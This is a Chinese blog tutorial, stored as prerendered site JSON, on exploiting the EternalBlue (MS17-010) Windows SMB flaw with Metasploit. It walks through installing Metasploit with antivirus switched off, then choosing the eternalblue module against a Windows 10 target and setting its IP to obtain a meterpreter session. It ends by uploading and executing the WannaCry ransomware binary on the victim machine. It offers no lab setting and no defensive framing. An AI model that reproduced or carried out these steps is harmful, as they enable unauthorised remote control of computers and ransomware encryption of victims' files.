[{"data":1,"prerenderedAt":732},["ShallowReactive",2],{"post-2026-03-13-ms17-010-eternalblue":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"tags":11,"body":15,"_type":726,"_id":727,"_source":728,"_file":729,"_stem":730,"_extension":731},"\u002Fblog\u002F2026-03-13-ms17-010-eternalblue","blog",false,"","永恒之蓝 (MS17-010)","永恒之蓝(MS17-010)漏洞利用教程，使用Metasploit Framework进行渗透测试与远程控制。","2026-03-13",[12,13,14],"Kali","安全","MSF",{"type":16,"children":17,"toc":721},"root",[18,39,58,65,75,105,113,122,129,138,206,219,251,264,273,287,294,299,307,327,340,436,443,474,494,501,524,556,563,587,594,599,607,658,666,715],{"type":19,"tag":20,"props":21,"children":22},"element","p",{},[23,30,32,37],{"type":19,"tag":24,"props":25,"children":26},"strong",{},[27],{"type":28,"value":29},"text","WannaCry病毒",{"type":28,"value":31},"，使用了",{"type":19,"tag":24,"props":33,"children":34},{},[35],{"type":28,"value":36},"永恒之蓝漏洞",{"type":28,"value":38},"，是一种在2017年5月大规模爆发的勒索病毒，它属于勒索病毒家族，主要通过加密用户计算机中的文件来进行勒索。",{"type":19,"tag":40,"props":41,"children":42},"blockquote",{},[43,48],{"type":19,"tag":20,"props":44,"children":45},{},[46],{"type":28,"value":47},"永恒之蓝",{"type":19,"tag":20,"props":49,"children":50},{},[51,56],{"type":19,"tag":24,"props":52,"children":53},{},[54],{"type":28,"value":55},"永恒之蓝(对应微软漏洞编号 MS17-010)",{"type":28,"value":57}," 是针对Windows的高危远程代码执行漏洞，最初由美国国家安全局开发为攻击工具，2017年4月被黑客组织\"影子经纪人\"公开后，引发了全球多起重大网络安全事件。",{"type":19,"tag":59,"props":60,"children":62},"h3",{"id":61},"msf安装windows版",[63],{"type":28,"value":64},"MSF安装(Windows版)",{"type":19,"tag":20,"props":66,"children":67},{},[68,73],{"type":19,"tag":24,"props":69,"children":70},{},[71],{"type":28,"value":72},"Metasploit Framework (MSF)",{"type":28,"value":74}," 是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit 可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以 \"可以黑掉整个宇宙\" 之名，支持 Windows、Linux、MACOS，本次课程我们将在 Windows 系统安装 MSF，并且学习相关的工具。",{"type":19,"tag":76,"props":77,"children":78},"ol",{},[79],{"type":19,"tag":80,"props":81,"children":82},"li",{},[83,85,94,96,103],{"type":28,"value":84},"访问官网进行下载，MSF在Kali中自带，MSF官网地址：",{"type":19,"tag":86,"props":87,"children":91},"a",{"href":88,"rel":89},"https:\u002F\u002Fwindows.metasploit.com\u002F",[90],"nofollow",[92],{"type":28,"value":93},"Metasploit Framework",{"type":28,"value":95},"\n（点击最新版的 ",{"type":19,"tag":97,"props":98,"children":100},"code",{"className":99},[],[101],{"type":28,"value":102},".msi",{"type":28,"value":104}," 结尾的链接）",{"type":19,"tag":20,"props":106,"children":107},{},[108],{"type":19,"tag":109,"props":110,"children":112},"img",{"alt":7,"src":111},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260208120927631.png",[],{"type":19,"tag":76,"props":114,"children":116},{"start":115},2,[117],{"type":19,"tag":80,"props":118,"children":119},{},[120],{"type":28,"value":121},"先关掉杀软，避免被检测出风险软件，也可以添加路径白名单；然后运行安装程序；",{"type":19,"tag":20,"props":123,"children":124},{},[125],{"type":19,"tag":109,"props":126,"children":128},{"alt":7,"src":127},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260208120927636.png",[],{"type":19,"tag":76,"props":130,"children":132},{"start":131},3,[133],{"type":19,"tag":80,"props":134,"children":135},{},[136],{"type":28,"value":137},"配置系统环境变量；",{"type":19,"tag":139,"props":140,"children":144},"pre",{"className":141,"code":142,"language":143,"meta":7,"style":7},"language-bash shiki shiki-themes github-dark","reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" \u002Fv Path \u002Ft REG_EXPAND_SZ \u002Fd \"%PATH%;D:\\metasploit-framework\\bin\" \u002Ff\n","bash",[145],{"type":19,"tag":97,"props":146,"children":147},{"__ignoreMap":7},[148],{"type":19,"tag":149,"props":150,"children":153},"span",{"class":151,"line":152},"line",1,[154,160,166,171,176,181,186,191,196,201],{"type":19,"tag":149,"props":155,"children":157},{"style":156},"--shiki-default:#B392F0",[158],{"type":28,"value":159},"reg",{"type":19,"tag":149,"props":161,"children":163},{"style":162},"--shiki-default:#9ECBFF",[164],{"type":28,"value":165}," add",{"type":19,"tag":149,"props":167,"children":168},{"style":162},[169],{"type":28,"value":170}," \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\"",{"type":19,"tag":149,"props":172,"children":173},{"style":162},[174],{"type":28,"value":175}," \u002Fv",{"type":19,"tag":149,"props":177,"children":178},{"style":162},[179],{"type":28,"value":180}," Path",{"type":19,"tag":149,"props":182,"children":183},{"style":162},[184],{"type":28,"value":185}," \u002Ft",{"type":19,"tag":149,"props":187,"children":188},{"style":162},[189],{"type":28,"value":190}," REG_EXPAND_SZ",{"type":19,"tag":149,"props":192,"children":193},{"style":162},[194],{"type":28,"value":195}," \u002Fd",{"type":19,"tag":149,"props":197,"children":198},{"style":162},[199],{"type":28,"value":200}," \"%PATH%;D:\\metasploit-framework\\bin\"",{"type":19,"tag":149,"props":202,"children":203},{"style":162},[204],{"type":28,"value":205}," \u002Ff\n",{"type":19,"tag":20,"props":207,"children":208},{},[209,211,217],{"type":28,"value":210},"命令中的 ",{"type":19,"tag":97,"props":212,"children":214},{"className":213},[],[215],{"type":28,"value":216},"D:\\metasploit-framework\\bin",{"type":28,"value":218}," 替换为自己的安装路径下的bin路径。",{"type":19,"tag":220,"props":221,"children":222},"ul",{},[223,241],{"type":19,"tag":80,"props":224,"children":225},{},[226,231,233,239],{"type":19,"tag":24,"props":227,"children":228},{},[229],{"type":28,"value":230},"命令行方式",{"type":28,"value":232},"：通过 ",{"type":19,"tag":97,"props":234,"children":236},{"className":235},[],[237],{"type":28,"value":238},"reg add",{"type":28,"value":240}," 直接修改注册表，无需图形界面，适合脚本化批量操作，也可以在没有图形界面的服务器上使用。",{"type":19,"tag":80,"props":242,"children":243},{},[244,249],{"type":19,"tag":24,"props":245,"children":246},{},[247],{"type":28,"value":248},"手动图形界面方式",{"type":28,"value":250},"：通过 \"系统属性→环境变量\" 的可视化界面来修改，更直观，适合普通用户单次操作。",{"type":19,"tag":20,"props":252,"children":253},{},[254,256,262],{"type":28,"value":255},"两者最终都会修改系统 ",{"type":19,"tag":97,"props":257,"children":259},{"className":258},[],[260],{"type":28,"value":261},"Path",{"type":28,"value":263}," 环境变量，让系统能在任意目录下找到 Metasploit 的工具。",{"type":19,"tag":76,"props":265,"children":267},{"start":266},4,[268],{"type":19,"tag":80,"props":269,"children":270},{},[271],{"type":28,"value":272},"启动MSF，在终端输入下列指令即可启动；",{"type":19,"tag":139,"props":274,"children":276},{"className":141,"code":275,"language":143,"meta":7,"style":7},"msfconsole\n",[277],{"type":19,"tag":97,"props":278,"children":279},{"__ignoreMap":7},[280],{"type":19,"tag":149,"props":281,"children":282},{"class":151,"line":152},[283],{"type":19,"tag":149,"props":284,"children":285},{"style":156},[286],{"type":28,"value":275},{"type":19,"tag":20,"props":288,"children":289},{},[290],{"type":19,"tag":109,"props":291,"children":293},{"alt":7,"src":292},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260208120927637.png",[],{"type":19,"tag":59,"props":295,"children":297},{"id":296},"利用永恒之蓝远控电脑",[298],{"type":28,"value":296},{"type":19,"tag":76,"props":300,"children":301},{},[302],{"type":19,"tag":80,"props":303,"children":304},{},[305],{"type":28,"value":306},"开始前必须了解永恒之蓝，指定它的编号（MS17-010），在终端搜索模糊漏洞编号；",{"type":19,"tag":139,"props":308,"children":310},{"className":141,"code":309,"language":143,"meta":7,"style":7},"search ms17-010\n",[311],{"type":19,"tag":97,"props":312,"children":313},{"__ignoreMap":7},[314],{"type":19,"tag":149,"props":315,"children":316},{"class":151,"line":152},[317,322],{"type":19,"tag":149,"props":318,"children":319},{"style":156},[320],{"type":28,"value":321},"search",{"type":19,"tag":149,"props":323,"children":324},{"style":162},[325],{"type":28,"value":326}," ms17-010\n",{"type":19,"tag":20,"props":328,"children":329},{},[330,332,338],{"type":28,"value":331},"也可以直接输入 ",{"type":19,"tag":97,"props":333,"children":335},{"className":334},[],[336],{"type":28,"value":337},"search ms17",{"type":28,"value":339}," 进行模糊查询也可以查到，查询到的结果中：",{"type":19,"tag":220,"props":341,"children":342},{},[343,368,388,408],{"type":19,"tag":80,"props":344,"children":345},{},[346,355],{"type":19,"tag":24,"props":347,"children":348},{},[349],{"type":19,"tag":97,"props":350,"children":352},{"className":351},[],[353],{"type":28,"value":354},"exploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue",{"type":19,"tag":220,"props":356,"children":357},{},[358,363],{"type":19,"tag":80,"props":359,"children":360},{},[361],{"type":28,"value":362},"这确实是永恒之蓝漏洞的最原始利用模块，用于直接发起攻击。",{"type":19,"tag":80,"props":364,"children":365},{},[366],{"type":28,"value":367},"它会通过 SMB 协议漏洞在目标系统上执行代码，常被用来获取目标的系统权限。",{"type":19,"tag":80,"props":369,"children":370},{},[371,380],{"type":19,"tag":24,"props":372,"children":373},{},[374],{"type":19,"tag":97,"props":375,"children":377},{"className":376},[],[378],{"type":28,"value":379},"auxiliary\u002Fscanner\u002Fsmb\u002Fsmb_ms17_010",{"type":19,"tag":220,"props":381,"children":382},{},[383],{"type":19,"tag":80,"props":384,"children":385},{},[386],{"type":28,"value":387},"这是一个被动的漏洞检测模块，它只负责扫描目标主机是否存在 MS17-010 漏洞，不会主动发起攻击。",{"type":19,"tag":80,"props":389,"children":390},{},[391,400],{"type":19,"tag":24,"props":392,"children":393},{},[394],{"type":19,"tag":97,"props":395,"children":397},{"className":396},[],[398],{"type":28,"value":399},"auxiliary\u002Fadmin\u002Fsmb\u002Fms17_010_command",{"type":19,"tag":220,"props":401,"children":402},{},[403],{"type":19,"tag":80,"props":404,"children":405},{},[406],{"type":28,"value":407},"这个模块可以在已确认存在漏洞的目标上直接执行终端命令，通常是在检测出漏洞后，用来快速验证权限或执行简单操作。",{"type":19,"tag":80,"props":409,"children":410},{},[411,420],{"type":19,"tag":24,"props":412,"children":413},{},[414],{"type":19,"tag":97,"props":415,"children":417},{"className":416},[],[418],{"type":28,"value":419},"exploit\u002Fwindows\u002Fsmb\u002Fms17_010_psexec",{"type":19,"tag":220,"props":421,"children":422},{},[423],{"type":19,"tag":80,"props":424,"children":425},{},[426,428,434],{"type":28,"value":427},"它是基于 MS17-010 漏洞的一个变种模块，主要作用是上传并执行 payload，比如植入后门或远控程序，功能比 ",{"type":19,"tag":97,"props":429,"children":431},{"className":430},[],[432],{"type":28,"value":433},"eternalblue",{"type":28,"value":435}," 更侧重 \"上传执行\"。",{"type":19,"tag":20,"props":437,"children":438},{},[439],{"type":19,"tag":109,"props":440,"children":442},{"alt":7,"src":441},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260208120927638.png",[],{"type":19,"tag":76,"props":444,"children":445},{"start":115},[446],{"type":19,"tag":80,"props":447,"children":448},{},[449,451,457,459,464,466,472],{"type":28,"value":450},"使用 ",{"type":19,"tag":97,"props":452,"children":454},{"className":453},[],[455],{"type":28,"value":456},"use",{"type":28,"value":458}," 命令选择使用的模块（模块前面的序号），此处以使用 ",{"type":19,"tag":97,"props":460,"children":462},{"className":461},[],[463],{"type":28,"value":354},{"type":28,"value":465}," 模块来攻击 ",{"type":19,"tag":97,"props":467,"children":469},{"className":468},[],[470],{"type":28,"value":471},"Windows10专业版",{"type":28,"value":473},"，使用下列命令；",{"type":19,"tag":139,"props":475,"children":477},{"className":141,"code":476,"language":143,"meta":7,"style":7},"use 8\n",[478],{"type":19,"tag":97,"props":479,"children":480},{"__ignoreMap":7},[481],{"type":19,"tag":149,"props":482,"children":483},{"class":151,"line":152},[484,488],{"type":19,"tag":149,"props":485,"children":486},{"style":156},[487],{"type":28,"value":456},{"type":19,"tag":149,"props":489,"children":491},{"style":490},"--shiki-default:#79B8FF",[492],{"type":28,"value":493}," 8\n",{"type":19,"tag":20,"props":495,"children":496},{},[497],{"type":19,"tag":109,"props":498,"children":500},{"alt":7,"src":499},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260208122242313.png",[],{"type":19,"tag":76,"props":502,"children":503},{"start":131},[504],{"type":19,"tag":80,"props":505,"children":506},{},[507,508,514,516,522],{"type":28,"value":450},{"type":19,"tag":97,"props":509,"children":511},{"className":510},[],[512],{"type":28,"value":513},"options",{"type":28,"value":515}," 来查看相关的配置信息，然后使用 ",{"type":19,"tag":97,"props":517,"children":519},{"className":518},[],[520],{"type":28,"value":521},"set",{"type":28,"value":523}," 设置相关的参数；",{"type":19,"tag":139,"props":525,"children":527},{"className":141,"code":526,"language":143,"meta":7,"style":7},"options\nset rhost \"目标IP\"\n",[528],{"type":19,"tag":97,"props":529,"children":530},{"__ignoreMap":7},[531,539],{"type":19,"tag":149,"props":532,"children":533},{"class":151,"line":152},[534],{"type":19,"tag":149,"props":535,"children":536},{"style":156},[537],{"type":28,"value":538},"options\n",{"type":19,"tag":149,"props":540,"children":541},{"class":151,"line":115},[542,546,551],{"type":19,"tag":149,"props":543,"children":544},{"style":490},[545],{"type":28,"value":521},{"type":19,"tag":149,"props":547,"children":548},{"style":162},[549],{"type":28,"value":550}," rhost",{"type":19,"tag":149,"props":552,"children":553},{"style":162},[554],{"type":28,"value":555}," \"目标IP\"\n",{"type":19,"tag":20,"props":557,"children":558},{},[559],{"type":19,"tag":109,"props":560,"children":562},{"alt":7,"src":561},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260208123009922.png",[],{"type":19,"tag":76,"props":564,"children":565},{"start":266},[566],{"type":19,"tag":80,"props":567,"children":568},{},[569,571,577,579,585],{"type":28,"value":570},"输入 ",{"type":19,"tag":97,"props":572,"children":574},{"className":573},[],[575],{"type":28,"value":576},"run",{"type":28,"value":578}," 开始运行，若成功显示 ",{"type":19,"tag":97,"props":580,"children":582},{"className":581},[],[583],{"type":28,"value":584},"meterpreter",{"type":28,"value":586}," 则表示已经成功远控该电脑。",{"type":19,"tag":20,"props":588,"children":589},{},[590],{"type":19,"tag":109,"props":591,"children":593},{"alt":7,"src":592},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260208174245408.png",[],{"type":19,"tag":59,"props":595,"children":597},{"id":596},"远控后上传病毒",[598],{"type":28,"value":596},{"type":19,"tag":76,"props":600,"children":601},{},[602],{"type":19,"tag":80,"props":603,"children":604},{},[605],{"type":28,"value":606},"在使用MSF成功得到目标电脑的控制端口后，执行传入病毒的指令：",{"type":19,"tag":139,"props":608,"children":610},{"className":141,"code":609,"language":143,"meta":7,"style":7},"upload 攻击者电脑的病毒绝对路径 受害者电脑病毒的存放路径\n# 以桌面的WannaCryptor.exe病毒为例\nupload C:\u002FUsers\u002FAdministrator\u002FDesktop\u002FRansom.WannaCryptor.exe C:\u002FWindows\u002Ftemp\n",[611],{"type":19,"tag":97,"props":612,"children":613},{"__ignoreMap":7},[614,632,641],{"type":19,"tag":149,"props":615,"children":616},{"class":151,"line":152},[617,622,627],{"type":19,"tag":149,"props":618,"children":619},{"style":156},[620],{"type":28,"value":621},"upload",{"type":19,"tag":149,"props":623,"children":624},{"style":162},[625],{"type":28,"value":626}," 攻击者电脑的病毒绝对路径",{"type":19,"tag":149,"props":628,"children":629},{"style":162},[630],{"type":28,"value":631}," 受害者电脑病毒的存放路径\n",{"type":19,"tag":149,"props":633,"children":634},{"class":151,"line":115},[635],{"type":19,"tag":149,"props":636,"children":638},{"style":637},"--shiki-default:#6A737D",[639],{"type":28,"value":640},"# 以桌面的WannaCryptor.exe病毒为例\n",{"type":19,"tag":149,"props":642,"children":643},{"class":151,"line":131},[644,648,653],{"type":19,"tag":149,"props":645,"children":646},{"style":156},[647],{"type":28,"value":621},{"type":19,"tag":149,"props":649,"children":650},{"style":162},[651],{"type":28,"value":652}," C:\u002FUsers\u002FAdministrator\u002FDesktop\u002FRansom.WannaCryptor.exe",{"type":19,"tag":149,"props":654,"children":655},{"style":162},[656],{"type":28,"value":657}," C:\u002FWindows\u002Ftemp\n",{"type":19,"tag":76,"props":659,"children":660},{"start":115},[661],{"type":19,"tag":80,"props":662,"children":663},{},[664],{"type":28,"value":665},"运行病毒",{"type":19,"tag":139,"props":667,"children":669},{"className":141,"code":668,"language":143,"meta":7,"style":7},"execute -f 受害者病毒存放路径\n# 继续以刚才的WannaCryptor.exe病毒为例\nexecute -f C:\u002FWindows\u002Ftemp\u002FRansom.WannaCryptor.exe\n",[670],{"type":19,"tag":97,"props":671,"children":672},{"__ignoreMap":7},[673,691,699],{"type":19,"tag":149,"props":674,"children":675},{"class":151,"line":152},[676,681,686],{"type":19,"tag":149,"props":677,"children":678},{"style":156},[679],{"type":28,"value":680},"execute",{"type":19,"tag":149,"props":682,"children":683},{"style":490},[684],{"type":28,"value":685}," -f",{"type":19,"tag":149,"props":687,"children":688},{"style":162},[689],{"type":28,"value":690}," 受害者病毒存放路径\n",{"type":19,"tag":149,"props":692,"children":693},{"class":151,"line":115},[694],{"type":19,"tag":149,"props":695,"children":696},{"style":637},[697],{"type":28,"value":698},"# 继续以刚才的WannaCryptor.exe病毒为例\n",{"type":19,"tag":149,"props":700,"children":701},{"class":151,"line":131},[702,706,710],{"type":19,"tag":149,"props":703,"children":704},{"style":156},[705],{"type":28,"value":680},{"type":19,"tag":149,"props":707,"children":708},{"style":490},[709],{"type":28,"value":685},{"type":19,"tag":149,"props":711,"children":712},{"style":162},[713],{"type":28,"value":714}," C:\u002FWindows\u002Ftemp\u002FRansom.WannaCryptor.exe\n",{"type":19,"tag":716,"props":717,"children":718},"style",{},[719],{"type":28,"value":720},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":115,"depth":115,"links":722},[723,724,725],{"id":61,"depth":131,"text":64},{"id":296,"depth":131,"text":296},{"id":596,"depth":131,"text":596},"markdown","content:blog:2026-03-13-MS17-010-Eternalblue.md","content","blog\u002F2026-03-13-MS17-010-Eternalblue.md","blog\u002F2026-03-13-MS17-010-Eternalblue","md",1780801017579]